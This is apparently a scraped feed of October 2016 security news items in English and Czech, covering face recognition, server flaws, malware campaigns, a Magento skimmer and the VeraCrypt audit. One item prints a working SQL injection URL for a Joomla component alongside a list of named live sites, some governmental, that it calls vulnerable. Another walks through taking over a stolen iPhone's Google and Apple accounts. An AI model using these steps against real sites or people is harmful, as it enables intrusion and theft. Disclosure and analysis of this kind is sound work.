Meanwhile, the facial-recognition technology is reportedly less accurate when used to identify black people, women and those aged 18 to 30.
"An accurate algorithm correctly identifies a face in an ATM photo and leads police to a robber's door," the report suggests. "An inaccurate algorithm sends them to the wrong house — and could send an innocent person to jail."
The report also describes how the facial recognition technology is spreading rapidly and is almost entirely unregulated.
The findings argue the First Amendment is meant to protect "our right to express ourselves anonymously," and warn that police use of face recognition "to continuously identify anyone on the street—without individualized suspicion—could chill our basic freedoms of expression and association, particularly when face recognition is used at political protests."
In response to this report, over 50 civil liberties groups, including the American Civil Liberties Union (ACLU), delivered a letter to the Department of Justice's Civil Rights Division Tuesday asking it to investigate the expanding use of face recognition technology around the country by police.
Using facial recognition technology, "Police are free to identify and potentially track anyone even if they have no evidence that that person has done anything wrong," says ACLU's legislative counsel Neema Singh Guliani. "We do not expect that the police can identify us when we're walking into a mosque, attending an AA meeting, or when we are seeking help at a domestic violence shelter."
The unsupervised use of face recognition systems on a regular basis threatens the privacy and civil liberties of Millions, especially immigrants and people of color, according to the dozens of signatories.
For in-depth information, you can head on to the report [PDF], titled "The Perpetual Line-up: Unregulated Police Face Recognition in America."
SQL Injection zero-day in component ja-k2-filter-and-search of Joomla
19.10.2016 securityaffairs Vulnerebility
Information Security experts have discovered an SQL injection zero-day vulnerability in Joomla component ja-k2-filter-and-search.
Information Security Researchers Dimitrios Roussis and Evangelos Apostoloudis have discovered an SQL injection vulnerability in component ja-k2-filter-and-search (https://www.joomlart.com/joomla/extensions/ja-k2-search) of Joomla, a popular open-source Content Management System (CMS).
This component has been used in various Joomla sites. Through the use of the sqlmap tool a malicious user is able to gain access to the website database revealing very critical or sensitive data in some cases
This vulnerability has not been yet detected or published in any international website. In addition, the component developer has not been informed about this critical issue so that all well-known databases are updated. Therefore this vulnerability is considered as a zero-day.
Any joomla website making use of the particular component can be checked for this vulnerability through the following request.
(WhateverSite)/index.php?category_id=(select%201%20and%20row(1%2c1)%3E(select%20count(*)%2cconcat(concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(117)%2cCHAR(82)%2cCHAR(57)%2cCHAR(71)%2cCHAR(65)%2cCHAR(77)%2cCHAR(98)%2cCHAR(77))%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&Itemid=135&option=com_jak2filter&searchword=the&view=itemlist&xf_2=5%27
As a result, the following error message is displayed proving the presence of vulnerability.
ja-k2-filter-and-search-joomla-flaw
By using the Sqlmap and the given URL it is evident that a dump of the database can be achieved.
List of Vulnerable Sites
http://www.active-business.gr/
http://www.aquariancladding.co.uk/
http://www.arhitektura.mrt.gov.me/
http://www.athenian-yachts.gr
http://www.bathroom-shop.gr/
http://www.beactive.cy/
http://www.bowmansales.com/
http://www.cmvcapanema.pr.gov.br/
http://www.dao-bzh.org/
http://www.edeskati.gr/
http://www.gardeshgar-ir.com/
http://www.getravel.gr/
http://www.gndr.org/
http://www.holiday116.ru/
http://www.html-template.ru/
http://www.igctravel.co.uk/
http://www.international-nightlife.com/
http://www.internationalweddinginstitute.com/
http://www.kidsland-nsk.ru/
http://www.kingstonrv.com/
http://www.l-proekt.com/
http://www.mauritanie-online.com/
http://www.mice.ru/
http://www.nchasia.com/
http://www.ohg-bensberg.de/
http://www.rustyoptical.com/
http://www.seam.gr/
http://www.sherdoust.ir/
http://www.tasteofedm.ca/
http://www.transitec.net/
http://www.usasciencefestival.org/
https://proyectostipo.dnp.gov.co
https://www.lvivrada.gov.ua/
https://www.lvivrada.gov.ua/
https://www.moriel.org/
Below the original post in greek language published by SecNews.gr
https://secnews.gr/149262/joomla-ja-k2-filter-and-search-zero-day/
Ops also the Trump Organization uses insecure e-mail servers
19.10.2016 securityaffairs Security
According to a security researcher, the Trump Organization’s mail servers run on an outdated version of Microsoft Windows Server.
Hillary Clinton is over in the storm for the violation of its private email server, even Trump has used the case to attack the rival.
The irony of fate, now we are here discussing because also Trump’s staff has some problems with his email servers. According to the security researcher Kevin Beaumont, the Trump Organization’s mail servers run on Microsoft Windows Server 2003 version with Internet Information Server 6 that is no more supported by the company. The researchers also discovered that servers are configured with minimal security.
What does it mean?
Simple, they are an easy target of hackers that can access to the organization’s e-mails servers.
Visualizza l'immagine su TwitterVisualizza l'immagine su Twitter
Segui
Kevin Beaumont ✔ @GossiTheDog
Quick update on Trump corp email servers - all internet accessible, single factor auth, no MDM, Win2003, no security patching.
00:44 - 18 Ott 2016
1.283 1.283 Retweet 1.286 1.286 Mi piace
Beaumont also discovered the Organization’s Web email access page, he explained that until yesterday morning, the Trump Organization allowed Outlook Web Access logins from webmail.trumporg.com.
According to Sean Gallagher of Ars, the e-mail access page webmail.trumporg.com displays the header for Microsoft Exchange Outlook Web Access (OWA). The analysis of the page HTML source code reveals that site is using an outdated application i.e. March 2015 build of Microsoft Exchange 2007 (SP3 RU16), which is a version known to be affected by many security issues. The login page reveals that the webmail site was running Microsoft Exchange 2007.
Beaumont pointed out that the email service doesn’t use two-factor authentication.
Below the comment sent via email by a spokesperson for the Trump Organization to the Motherboard website, he seems to downplay the problem.
“The Trump Organization deploys best in class firewall and anti-vulnerability technology with constant 24/7 monitoring. Our infrastructure is vast and leverages multiple platforms which are consistently monitored and upgraded using current cyber security best practices.”
Bezpečnostní experti upozornili na 12 let starou chybu. Uživatelé se bránit nemohou
19.10.2016 Novinky/Bezpečnost Zranitelnosti
I 12 let stará chyba dokáže udělat bezpečnostním expertům pěkné vrásky na čele. Přesně takto starou trhlinu totiž objevili v minulých dnech bezpečnostní experti, kteří zároveň zjistili, že kyberzločinci ji mohou zneužít k útokům na zařízení internetu věcí (IoT). Samotní uživatelé se přitom prakticky bránit nemohou.
Co je internet věcí?
Za zkratkou IoT (Internet of Things, česky internet věcí) se ukrývá označení pro chytré přístroje, které jsou schopny připojovat se na internet a komunikovat mezi sebou prostřednictvím této celosvětové počítačové sítě.
Typicky jde například o zařízení, která umožňují sledování či ovládání některých funkcí na dálku. Připojit se k nim je možné prostřednictvím chytrého telefonu nebo počítačového tabletu přes internet, i když je uživatel na druhém konci planety.
Celosvětovou počítačovou síť mohou tímto způsobem využívat nejrůznější rekordéry, meteorologické stanice, ale klidně také chytré žárovky, u kterých je možné upravovat teplotu světla.
Chyba se týká protokolu OpenSSH, který využívají právě zmiňovaná zařízení ze segmentu chytrých domácností. Upozornili na ní výzkumníci ze společnosti Akamai Technologies – jednoho z největších světových poskytovatelů sítí distribuovaného obsahu.
Trhlinu mohou útočníci zneužít k tomu, aby v napadených zařízeních změnili nastavení proxy. Díky tomu jsou pak schopni řídit internetový provoz dotyčných přístrojů. Se stovkami tisíc napadených strojů, které je poslechnou na slovo, jsou schopni provádět například DDoS útoky.
Při něm velké množství PC – v tomto případě zařízení internetu věcí – začne přistupovat v jeden okamžik na konkrétní server. Ten zpravidla nezvládne tak vysoké množství požadavků zpracovat a spadne. Pro běžné uživatele se takto napadená webová stránka tváří jako nedostupná.
Přes dva milióny zařízení v ohrožení
Obavy jsou v případě objevené chyby na místě. Výše popsaným způsobem totiž mohou být zotročeny kvůli chybě v OpenSSH více než dva milióny zařízení.
Lze navíc předpokládat, že počítačoví piráti se trhlinu budou snažit velmi rychle zneužít. Botnety – tedy sítě zotročených počítačů nebo zařízení schopných přístupu na internet – jsou totiž na černém trhu ceněnou zbraní.
S dostatkem zotročených počítačů jsou totiž útočníci schopni vyřadit z provozu prakticky jakoukoliv webovou stránku a její provozovatele pak následně například vydírat, žádají po nich peníze za to, že útok ustane.
Chybu v protokolu OpenSSH může opravit pouze výrobce daného zařízení, a to vydáním nového firmwaru. Na rozdíl od klasických počítačů se tak uživatelé prakticky v současnosti před novou hrozbou bránit nemohou.
Popularita internetu věcí poroste
Internet věcí představuje pro uživatele velké pohodlí, zároveň se ale ukazuje i jeho stinná stránka – slabá bezpečnost.
Do roku 2020 přitom vzroste podle expertních odhadů počet připojených zařízení k internetu z nynějších 15 miliard na 200 miliard zařízení, na jednoho člověka tak připadne 26 těchto chytrých zařízení.
Kybernetické útoky jsou sofistikovanější, experti trénují obranu
19.10.2016 Novinky/Bezpečnost Počítačový útok
Kybernetické útoky jsou stále sofistikovanější. Odborníci, kteří pečují o kritickou páteřní infrastrukturu, proto potřebují častější a realističtější trénink. Novinářům to u příležitosti cvičení v brněnském kybernetickém polygonu řekl Radim Ošťádal z Národního centra kybernetické bezpečnosti. Centrum je součástí Národního bezpečnostního úřadu.
Důležité nejsou podle expertů jen technické znalosti a vybavení, ale i takzvané měkké dovednosti, třeba dělba práce a schopnost koordinace.
"Je velmi důležité si rozdělit, co má který člen týmu na starost. Stávalo se, že se dva členové zaměřili na jednu oblast a nevěnovali pozornost nějaké jiné, možná ještě důležitější, a bylo to proto, že se na začátku nedokázali efektivně domluvit," řekl vedoucí bezpečnostního týmu Masarykovy univerzity Jan Vykopal, který vyhodnocoval výsledky dřívějších cvičení.
Podmínky, které se blíží realitě
Trénink v polygonu umožňuje navodit podmínky, které se blíží realitě. Scénářem je tentokrát obrana bezpečnostního systému chránícího železniční síť a transportu s jaderným odpadem před útoky hackerských aktivistů. Experti ze státní sféry, firem i bezpečnostních složek jsou rozdělení do šesti týmů. Musejí zvládat také simulované informování veřejnosti a komunikaci s novináři.
"Letošní scénář jsme udělali složitější, obsahuje více zařízení a služeb. Týmy musí zvládnout nejen jejich obranu, ale musí být schopny také komunikovat s okolím a mít právní povědomí o dopadech svých rozhodnutí," popsal Vykopal. V polygonu jsou pozorovatelé z Finska a Estonska.
Do kritické informační infrastruktury spadají například systémy mobilních operátorů, bank a elektráren i sítě kontrolující dopravu. Podobná cvičení zaměřená na obranu infrastruktury jsou běžná po celém světě, vysoce ceněná jsou například cvičení organizovaná NATO.
Policie zadržela v centru Prahy ruského hackera, který měl napadat cíle v USA
19.10.2016 Novinky/Bezpečnost Hacking
Čeští policisté zadrželi ve spolupráci s americkým Federálním úřadem pro vyšetřování (FBI) mezinárodně hledaného ruského hackera, který údajně napadal cíle v USA. Po zadržení muž zkolaboval a musel být hospitalizován.
„Muž byl zadržen už 12 hodin po přijetí první operativní informace,“ řekl mluvčí policejního prezidia David Schön. Hledaný byl podle mluvčího zákrokem policistů natolik překvapen, že nekladl žádný odpor.
„Bezprostředně po zadržení se u muže projevil kolapsový stav a policisté mu museli neprodleně poskytnout první pomoc a nakonec byl hospitalizován v nemocnici,“ řekl Schön.
Po Česku se pohyboval luxusním vozem v doprovodu své přítelkyně. K samotnému zadržení došlo v jednom z hotelů v centru Prahy. Městský soud v Praze rozhodl o mužově vzetí do vazby. O vydání hackera do USA boudo nyní rozhodovat justiční orgány.
Political Cyberattacks: Senior Turkish Government Officials Affected by Advanced Malware
19.10.2016 securityaffairs Virus
Experts at ElevenPaths, a Telefonica’s cyber security unit, provided further details on political cyberattacks leveraging on advanced malicious codes.
On 19 July at 11pm Ankara time, Wikileaks published the first emails that were grabbed from the Turkish AKP. The organization led by Julian Assange, being in line with its policy on publication of secret information, also released the content of the attachments spreading the malware contained in the emails.
Erdoğan Emails wikileaks
However, many aspects of these attacks are still unknown as ElevenPaths, Telefonica’s cyber security unit, states in the recent report where the malware samples and their malicious content have been analyzed.
The Infection Vector
One of the requirements that any attacker needs to handle is to get access to a technological infrastructure that allows him to maintain control of the infected systems without being detected. In this case, after analyzing the source IP addresses of the compromised emails it has been found that the attackers leveraged vulnerable configurations on mail servers to maximize their chances of success. This way they could perform up to three different social engineering techniques with the aim of ensuring that each recipient opened the attached malicious files.
Impersonating AKP email accounts with the domain org.tr.
Using organization administration usernames as senders:
Adopting email accounts with domains that appeared to come from reliable organizations like hosting companies, operators, or other mail services.
Amongst the 2067 IP addresses which became the source of the malicious emails distributed worldwide included web servers, residential ADSLs and mail servers. The large number of IP addresses used for sending the emails, as well as the types variety and the fact that they are spread over a wide area, has served as a key element in ensuring the anonymity of the attackers.
Types of Malware used in the political cyberattacks
Mainly, downloaders (programs or scripts involved in the first phase of infection, responsible for downloading the malicious file) have been found. These downloaders were focused on downloading ransomware and banking Trojans linked to massive campaigns performed by organized cybercrime syndicates for purely monetary purposes. However, the most important aspect of the research was the identification of the use of backdoor Trojans that are usually associated with information thefts and attacks that may include lateral movements or other techniques associated with Advanced Persistent Threats.
After analyzing all the malicious attachments, several senior Turkish government officials have been identified as the target of these Trojans like Bekir Bozdağ (Ministry of Justice), Ömer Çelik (Minister of European Union Affairs), Nurettin Canikli (Deputy Prime Minister of Turkey) and Hüseyin Çelik (Minister of National Education).
Traditional Security Is Not Enough
Traditional security solutions are not enough to tackle samples which are very fresh and which could be related to targeted political cyberattacks, since they are unlikely to be found on black lists. However, defense technology against advanced malware can be the solution to threats that have a very high probability of being implemented in all kinds of entities, both corporate and governmental.
In the words of Eugene H. Spafford, a well-known computer security expert, the only truly secure system is one that is powered off, cast in a block of concrete and sealed in a lead-lined room with armed guards. And even then Eugene has his doubts. This case is another illustrative reason of why it is always important to stay alerted in regard to our own defense systems.
The ‘Sin’ Card: How criminals unlocked a stolen iPhone 6S
19.10.2016 securityaffairs Apple
Even if you have an iPhone 6S protected by a 6 digits password plus the touch ID fingerprint it is possible to unlock it.
1. Introduction
You have an iPhone 6S protected by a 6 digits password plus the touch ID fingerprint and you may think that nobody can unlock it without the code, right? Wrong! At least not, according to the incident we analyzed this week at Morphus Labs.
An iPhone 6S, exactly as described in the previous paragraph, was stolen three days ago. The victim told us that, right after the incident, the criminals did reset some of their online services passwords, like Apple ID and contacted his bank pretending to be him in an attempt to retrieve the bank account’s passwords. Fortunately, they couldn’t reach the victim’s money, but, how could they reset the Apple ID password from a locked device?
To better understand this scenario, we’ve collected more information about the victim:
a) Could it have been a targeted attack, I mean, was the thief focused on stealing that iPhone specifically? Could the thief have previously grabbed the victim’s credentials using an e-mail phishing scam or something like that?
Probably not. According to the information we collected, the iPhone was the last item that the thief asked the victim.
b) Did some ID or other documents with the victim’s information also stolen? It is important to understand if the thief knew the victim’s name or e-mail address.
No. No ID or document with the victim’s name or any other information was stolen. They just asked for money and the iPhone.
c) How long did it take to the victim to lock the iPhone and SIM card?
Approximately 2 hours after the theft.
d) Was the iPhone password “guessable”?
No. The 6 digits password wasn’t easily guessable and had no relation to the victim’s car plate number or personal information that the thief might have.
So, given this mysterious scenario, we decided to dive into the situation and understand how the victim’s iPhone was unlocked.
2. The timeline
We will now establish a timeline to organize the facts that happened last October 14th afternoon:
a) 14:00 – the theft occurred;
b) 16:03 – the victim activated the lost mode of its iPhone and asked for it to be remotely erased through iCloud;
c) 16:28 – the victim’s Google Account password was changed;
d) 16:37 – the victim received an e-mail with a link to redefine its Apple ID’s password;
e) 16:38 – a new e-mail informing the victim that the Apple ID password has been changed;
f) 16:43 – a new e-mail informing that the iPhone has been located;
g) 16:43 – a new e-mail informing that the iPhone was being erased;
So, as we can see, the victim’s Google and Apple accounts passwords were reset by the thief of the iPhone. As we all know, unlocking an iPhone without the proper credentials is a “hard to unfeasible” work. So, how did they do it?
Based on the facts that we established on the timeline, we started to work on some questions that might explain what happened:
1) To change a Google account password, you have to inform at least your login, in other words, your e-mail address. How the e-mail address might have been discovered?
Despite the fact the latest IOS version shows information and notifications even on a locked iPhone, in our simulations, nothing appeared on the screen that could give the user’s Gmail address away;
2) Is there a way to discover the Apple ID from the device’s IMEI?
We searched on the Web and found paid services that offer exactly that: “discover the Apple’s ID from a given IMEI”. But all of them inform that this isn’t an online process. It could take 24 to 48 hours for you to get the information you want. This was not the case. The whole process took around 2 hours.
3) Is there a way to discover a Gmail account based on the only information that the criminal had, that is, the phone number?
We did some search again and realized that Google offers a way to discover an e-mail address based on some given data: the phone number that you associate to your account, a name and a surname. As the phone number could be easily discovered in this scenario, discovering the name and surname from that phone number could be less than hard. We’re starting to get somewhere…
3. The hypothesis simulation
So, we decided to follow that way and try to find the name and surname of the victim from the perspective of the thief. This time, arranging our lab wasn’t a tough task. The victim bought a new iPhone 6S smartphone, configured exactly the way the stolen one was and gave to us for the purpose of this research. That way, our scenario was as close as possible to the real scenario – including the same Google and Apple accounts.
3.1. Discovering the phone number
To obtain the phone number, we removed the SIM card from the iPhone and inserted it on another phone. Similar to the real scenario, no PIN lock was in place. On the other phone, it was easy to identify the phone number.
3.2. Low-hanging fruit
Now, having the phone number, we followed the “low-hanging fruit” strategy at first. We tried to find the victim’s name putting his phone number on the Internet search engines. Unfortunately, we didn’t find anything useful.
The next approach was to look for the phone number on Facebook. We know that if you have your phone number associated to your profile, it’s easy to find you by your phone number. Once again, nothing was found.
3.3. Thinking outside the box
Nothing on the low-hanging fruit, so, time to think outside the box. Of course that there could exist different ways to find out a person name by its phone number, but we decided to insist a little more in finding it with the information we have on our hands.
So, I remembered that recently I changed my smartphone. While configuring the new one, my WhatsApp profile came with my photo – and I didn’t restore if from the backup. But I didn’t remember if it came with my profile name and I decided to see if this strategy could give us the victim’s name.
To do so, we removed the SIM card from the locked iPhone and inserted it on a second smartphone with Whatsapp installed. We followed the initial configuration, receiving the SMS and so on, but unfortunately (of fortunately), WhatsApp did not load the profile name. It brought just the profile photo and status.
Yet related to WhatsApp, a second idea came into place. You might remember that if you are in a WhatsApp group and receive a message from a person that is not in your contact list, its name appears just after its phone number (ie: 9999-9999 ~Mike Arnold). So, it would be possible to send a message from that locked iPhone to a WhatsApp group, we could get the name associated to that profile.
3.4. (Whatsapp + Locked screen notification response) hacking
So, firstly, we confirmed that the iPhone was configured to show WhatsApp notifications on the locked screen sending it a single message. The message was shown as expected. The next step was to try to answer that message from the locked iPhone. Using the “3D touch” functionality, we were able to answer that message.
Initial validations were done, time to try the group message approach. We created a group and included the contact associated with the locked iPhone’s number. As there is no validation for you to enter a new group, as we did this and a new message was shown on the locked iPhone screen informing that it is now part of that new group.
As we had to create a contact associated with the iPhone number on the smartphone that created the group, we had to include a third participant in the same group. This third participant has no contact data related to the iPhone’s number.
So, that was all set. We sent a message from one of the group participants. As expected, the message arrived on the locked iPhone screen. We answered it from the locked iPhone and, as expected again, the message sent to the third participant came associated to the iPhone’s Whatsapp profile name. Stage completed.
The next and easiest step was to put those three parameters we discovered (phone number, name and a surname) in the Google form and get the e-mail address associated with that person. Stage completed.
3.4. Changing the Google account password
Now, let’s try to replay the password change made by the criminal. The next steps were:
– Enter Google login screen;
– Choose “forget my password” option;
– Insert any text on the “last password that you remember”;
– On the next screen, Google asks for the phone number associated with the account. They only show a partial of the phone number, but the last two digits allowed us to believe we were on the right track;
– Inserting the iPhone’s phone number, Google sent to iPhone a code through SMS to be inserted on the next screen;
– After doing that, Google offered us to input a new password for that account.
At that moment, we reproduced the Google account password change by mimicking what the criminal did and started to think how easy it could be, depending on the way it was set, to change someone’s Google account password having only its phone or SIM card and its first and last name – even for some minutes (or seconds).
3.5. Changing the Apple ID password
So, we continued following the incident timeline. On the next step we used the previous discovered Google e-mail as the Apple ID account login and choose the option “forget password” again. After that, a message was shown informing that an e-mail was sent to the Google account with a link to reset the password. The rest of this paragraph is easy to figure out. We had success changing the password associated with that Apple ID.
3.6. Unlocking the “new” iPhone
Based on the facts that occurred in the real incident, it was time to remotely lock and erase the iPhone we were using to do the simulations.
I could bet these procedures helped the criminal getting access to the iPhone. After the erase process, the iPhone asks you to enter the Apple ID and password that was previously associated to that device. And, as we have that information, it was easy to access and configure the “new” iPhone from scratch.
4. Vulnerabilities and Recommendations
Well, of course we might have followed a different strategy compared to that of the criminals, but the result was the same – an iPhone unlocked without its credentials.
However, to achieve this result, there are some assumptions that we will consider as vulnerabilities that should be avoided:
a) Locked phone notifications
Allowing your smartphone to show notifications while locked is a great convenience. But at the same time, allowing them may represent a great risk to your privacy and security.
As shown in our experiment, this feature allowed us to read SMS and WhatsApp messages and, worst, answer it without unlocking the device.
We strongly recommend disabling “show notifications on your locked smartphone” (advice for users). Depending on your platform (Android or IOS) or App, there are different ways to configure this.
b) The ‘Sin’ Card
This episode remembered us how important it is to protect the SIM card. We all take care of locking our smartphones with strong passwords and fingerprint auth, strong encryption and so on (don`t we?), but we have to remember the importance of properly securing the SIM card.
As we could see on the experiments we did on this research, the SMS is an important peace nowadays in terms of transaction validation and authentication services. We used it to receive the Google unlock code, but it could be used to authenticate other kinds of transactions.
So, we recommend to set a password protection (PIN) to your SIM card. That way, you considerably reduce the risk of impersonation if you lose or you have your cell phone stolen.
Depending on your smartphone, there are different ways to configure it. Remember that, after you set your SIM card PIN, you have to insert it every time you reboot your smartphone (which is not very usable).
c) Two-factor authentication
Last but not least, please, enable two-factor authentication on your accounts right now! Two-factor authentication means that you have to provide a combination of at least two methods to prove your identity to the system you are dealing with. The possible factors you can pick from are these three: something that you know, like a password; something that you have, like a hard or soft token and something that you are, like your fingerprint.
Nowadays, almost all of the Internet services offers you the option to configure two-factor authentication – usually a password and token. There is an option for the second factor to be sending you an SMS, but we know that it may be fragile. Preferably, choose to use an App, like Google Authenticator, to generate the token.
This strategy will strongly reduce the risks of unauthorized access to your account. If the victim of this incident was using two-factor authentication, it would be impossible to change their password by using the SMS strategy.
5. Final words
Given the short period of time between the theft and the accounts hacking process, we believe that this strategy is widely used to unlock lost and stolen devices.
Aside from the financial loss directly involved with having an iPhone lost/stolen, this case brings us an important reflection. Are we protecting our SIM cards and SMS messages as we should? The potential impact, like improper information access or disclosure in scenarios like the one from this article, could be even more devastating. It would be an overkill to compare an unlocked SIM card to an important password that you carry every day, in clear text, attached to your smartphone?
Magento card-swiping malware hides stolen card data in legitimate images
19.10.2016 securityaffairs Virus
Security experts have spotted an interesting exfiltration technique adopted by crooks to exfiltrate card data from Magento platforms.
Security experts from Sucuri and RiskIQ have spotted an interesting exfiltration technique adopted by crooks to exfiltrate payment data from compromised e-commerce websites powered by the Magento platform.
Cybercriminals have been using image files to store and exfiltrate payment card data stolen from the target website. This last wave of attacks targeted over 100 online shops running on Magento, Powerfront CMS and OpenCart e-commerce platforms
Typically attackers use card-swiping malware that steals credit card data from the Magento shot and exfiltrates it via email or storing information in a file that is later accessed by hackers.
Experts noticed an interesting attack on Magento shops in which cybercriminals have used a malicious PHP file that dumps stolen data into an image file.
Similar exfiltration techniques are common, anyway, the attackers usually don’t use files containing real images send out the information.
“This is not out of the ordinary. It is actually characteristic of a lot of the credit card swipers we have seen lately.” reads a blog post published by Sucuri.
“Attackers use image files as an obfuscation technique to hide stolen details from the website owner. The image file usually doesn’t contain a real image, however, no one really suspects an image file to contain malware. This gives the attacker a secret place to store data. If the attacker had chosen to store the stolen credit card details in a simple text file then it might be easier for someone to discover it and take steps to remove the hack.”
In this specific case, the imaged used to store the payment card data are real and are related to the products offered for sale on the compromised website. This technique allows attackers to remain under the radar and avoid raising any suspicion.
The stolen data is appended at the end of the image file in clear text, and the file is publicly accessible. According to Sucuri, the majority of stolen card data came from the United States, but the files include also data related to victims from Japan, Turkey, Saudi Arabia and Canada.
“To obtain the stolen numbers the attacker would not even have to maintain access to the site. The image was publicly accessible. All the attacker would need to do is download the image from the website just like any other and view its source code.” continues the post.
Sucuri invites owners of websites powered by Magento to keep their CMS up to date and apply all the latest patches.
It also invites administrators of the websites to use a complex password.
Nelegálně sbíráte data o lidech, nařkl soud tajné služby
19.10.2016 SecurityWorld Kyber
S vysokou pravděpodobností sbírá data o svých občanech téměř každý stát. Je otázkou, nakolik je tato činnost transparentní; soudní rozhodnutí ve Velké Britanii se však může stát první vlaštovkou postupného přiznávání špionážní činnosti na vlastních občanech.
Soud ve Spojeném království rozhodl o tom, že letitý sběr téměř všech informací o komunikaci tamějších občanů (s výjimkou samotného obsahu komunikace) porušuje Evropskou úmluvu o lidských právech.
Po veřejném přiznání vlády k této činnosti se ale sběr informací stává legálním, tvrdí Investigatory Powers Tribunal, nezávislý útvar, který se zabývá stížnostmi na zpravodajské agentury. Útvar však ještě čeká rozhodnutí o tom, zda lze ospravedlnit šíři získávaných informací a zda jednání agentur bylo úměrné hrozbám, které se snažily eliminovat.
Na základě stížnosti sdružení Privacy International z června 2015 tribunál souhlasí, že informační služby Spojeného království skutečně po dlouhé roky porušovaly Evropskou úmluvu o lidských právech tím, jak ve velkém sbíraly osobní informace o občanech státu.
Data zahrnují informace o tom, kdo kontaktoval koho, kdy, kde a pomocí čeho, kdo platil za hovor a kolik platil. „Prakticky jediné informace, které agentury nesbíraly, jsou samotný obsah,“ popisuje ve svém verdiktu soud. Legální sběr takových informací by vyžadoval příkaz k zadržení daného subjektu.
V principu vláda může zpravodajským službám povolit sběr komunikačních dat od mobilních a internetových operátorů díky zákonu z roku 1984 (shodou okolností rok vzniku zákona koresponduje s názvem antiutopického románu George Orwella, který se zabývá mj. právě otázkou „Velkého bratra“, tedy sledování občanů státem).
Zda však byl sběr dat a jeho šíře nutná je otázka zcela jiná: když v roce 1984 zákon vznikl, podotýká tribunál, žádné mobilní telefony ani internet neexistovaly.
Mimo dat týkajících se přímo komunikace sbíraly agentury také osobní informace - databáze pasů, telefonní adresáře, bankovní záznamy. Dle vyjádření tajných služeb během soudního řízení je však majorita občanů pro potřeby agentur nezajímavá.
Pravidla pro masový sběr osobních dat britská legislativa neupřesňuje, dodává tribunál. Informace o činnosti informačních služeb vyplynuly na povrch až v březnu roku 2015, vláda se ke sledování následně přiznala v listopadu téhož roku.
Dle tribunálu se sběr dat po přiznání vlády stal legálním, neboť je „předvídatelný“. Občané mohou předvídat, že je někdo sleduje, a musí tak počítat s následky svých činů.
„Je nepřijatelné, že jen skrze občanský soudní proces započatý charitou jsme se dozvěděli rozsah moci [tajných služeb] a jak ji využívají,“ říká Millie Graham Woodová, právnička Privacy International. Zároveň vyzvala agentury k veřejnému potvrzení, že nelegálně získaná osobní data budou zničená.
O konci praktiky shromažďování dat o občanech si ale v této neklidné době můžeme nechat jedině zdát. Ba naopak - s vývojem nových technologií bude stát mít k dispozici ještě více nástrojů, pomocí kterých své občany může sledovat.
Zákeřný virus se snaží získat fotografii uživatele a informace o platební kartě
18.10.2016 Novinky/Bezpečnost Viry
Na pozoru by se měli mít uživatelé před nově objeveným škodlivým kódem, který jim může udělat čáru přes rozpočet. A to doslova – prostřednictvím nezvaného návštěvníka se totiž kyberzločinci snaží z důvěřivců vylákat citlivé údaje. Před hrozbou varovali bezpečnostní experti antivirové společnosti Kaspersky Lab.
Virus Acecard se šíří především přes sociální sítě a e-maily, ještě přesněji prostřednictvím odkazů na podvodné webové stránky obsahující nějaké zajímavé video. Na nich je uživatel vyzván k tomu, aby nainstaloval aktualizaci Adobe Flash Playeru, tedy pluginu, který je potřebný právě k přehrávání videí.
Místo updatu si však důvěřivci do svého počítače stáhnou právě nezvaného návštěvníka. Sluší se podotknout, že nově objevený nezvaný návštěvník v současnosti útočí výhradně na smartphony s operačním systémem Android.
Virus v mobilu číhá
Na nich pak virus vyčkává na svou příležitost. Aktivuje se až ve chvíli, kdy chce uživatel spustit nějakou aplikaci, která dokáže pracovat s kreditní kartou. Jde tedy o nejrůznější programy internetového bankovnictví a internetových obchodů.
Po jejich spuštění se na dotykovém displeji zobrazí informace o tom, že je nutné zadat informace o platební kartě, a to včetně ověřovacích údajů. Důvěřivci se přitom mohou mylně domnívat, že data zadávají skutečně do dobře známé aplikace, ve skutečnosti je ale podvodníkům naservírují jako na zlatém podnosu.
„Okno s žádostí o vyplnění citlivých údajů se zobrazuje přes legitimní aplikace. Méně pozorní uživatelé tak nemají moc velkou šanci zjistit, že jde o podvod,“ varoval bezpečnostní expert společnosti McAfee Bruce Snell.
Pouze s informacemi o kartě se přitom útočníci nespokojí. „Po opsání číselných kombinací z karty žádají kyberzločinci o další doplňující informace. Chtějí jméno, adresu, datum narození, a dokonce i aktuální fotku s občanským průkazem,“ doplnil Snell.
Vybílí účet, založí půjčku
Všechna tato data mohou počítačoví piráti zneužít nejen k vybílení cizího účtu, ale například i k založení půjčky na majitele účtu apod. Hrozbu tedy není vhodné podceňovat, protože kyberzločinci mohou uživatele připravit klidně i o peníze, které na účtu nemají.
Řada bank samozřejmě v dnešní době používá různé systémy ověření, které mají podobnému zneužití zamezit. Například platby kartou je nutné potvrzovat ještě SMS zprávou. Vzhledem k tomu, že se útočníci dostanou do chytrého telefonu, nebude jim činit žádný problém i potvrzovací zprávy odchytávat.
Virus Acecard se doposud šířil především na asijských počítačových sítích. Není nicméně vyloučeno, že jej kyberzločinci nasadí také v Evropě, či dokonce v České republice.
VeraCrypt Audit Reveals Critical Security Flaws — Update Now
18.10.2016 thehackernews Vulnerebility
After TrueCrypt mysteriously discontinued its service, VeraCrypt became the most popular open source disk encryption software used by activists, journalists, as well as privacy conscious people.
First of all, there is no such thing as a perfect, bug-free software.
Even the most rigorously tested software, like the ones that operate SCADA Systems, medical devices, and aviation software, have flaws.
Vulnerabilities are an unfortunate reality for every software product, but there is always space for improvements.
Due to the enormous popularity of VeraCrypt, security researchers from the OSTIF (The Open Source Technology Improvement Fund) agreed to audit VeraCrypt independently and hired researchers from QuarksLab in August to lead the audit.
And it seems like VeraCrypt is not exactly flawless either.
Now after one month of the audit, researchers have discovered a number of security issues, including 8 critical, 3 medium, and 15 low-severity vulnerabilities in the popular encryption platform VeraCrypt.
Quarkslab senior security researcher Jean-Baptiste Bédrune and senior cryptographer Marion Videau analyzed the VeraCrypt version 1.18 and the DCS EFI Bootloader 1.18 (UEFI), mainly focusing on new features introduced since last year's TrueCrypt security audit.
VeraCrypt file encryption software has been derived from the TrueCrypt project, but with enhancements to further secure your data.
"VeraCrypt is a project hard to maintain," researchers said. "Deep knowledge of several operating systems, the Windows kernel, the system boot chain and good concepts in cryptography are required. The improvements made by IDRIX demonstrate the possession of these skills."
The researchers have detailed all the vulnerabilities in a 42-page audit report [PDF], which includes:
Critical bugs in the implementation of GOST 28147-89, a symmetric block cipher with a 64-bit block size, which they say must be removed completely due to unsafe implementation.
